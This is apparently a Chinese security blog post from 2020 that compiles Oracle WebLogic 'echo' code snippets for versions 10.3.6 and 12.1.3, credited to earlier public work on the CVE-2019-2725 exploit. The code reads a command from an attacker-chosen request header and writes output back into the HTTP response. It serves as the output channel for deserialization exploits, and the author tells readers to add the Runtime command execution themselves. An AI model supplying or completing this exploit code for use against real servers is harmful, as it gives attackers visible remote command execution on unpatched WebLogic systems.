整理一下weblogic回显的代码

这些回显的路径与取值是市面上已经公开的,此文是为了补充前几天所说的jetty的中间件回显。

提供的代码只是提供了回显的路径,并没有加上runtime,这块请自行添加。

weblogic10.3.6

1 String lfcmd = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader("lfcmd");
2 weblogic.servlet.internal.ServletResponseImpl response = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
3 weblogic.servlet.internal.ServletOutputStreamImpl outputStream = response.getServletOutputStream();
4 outputStream.writeStream(new weblogic.xml.util.StringInputStream(lfcmd));
5 outputStream.flush();
6 response.getWriter().write("");

weblogic12.1.3

1 java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)this.getCurrentWork()).getClass().getDeclaredField("connectionHandler");
2 field.setAccessible(true);
3 HttpConnectionHandler httpConn = (HttpConnectionHandler) field.get(this.getCurrentWork());
4 httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream("xxxxxx"));

 

其实这块代码在2725的回显里已经被人提出,我是搬运过来记录整理。

 

原文见:https://xz.aliyun.com/t/5299#toc-9

posted @ 2020-04-29 16:11  ph4nt0mer  阅读(...)  评论(...编辑  收藏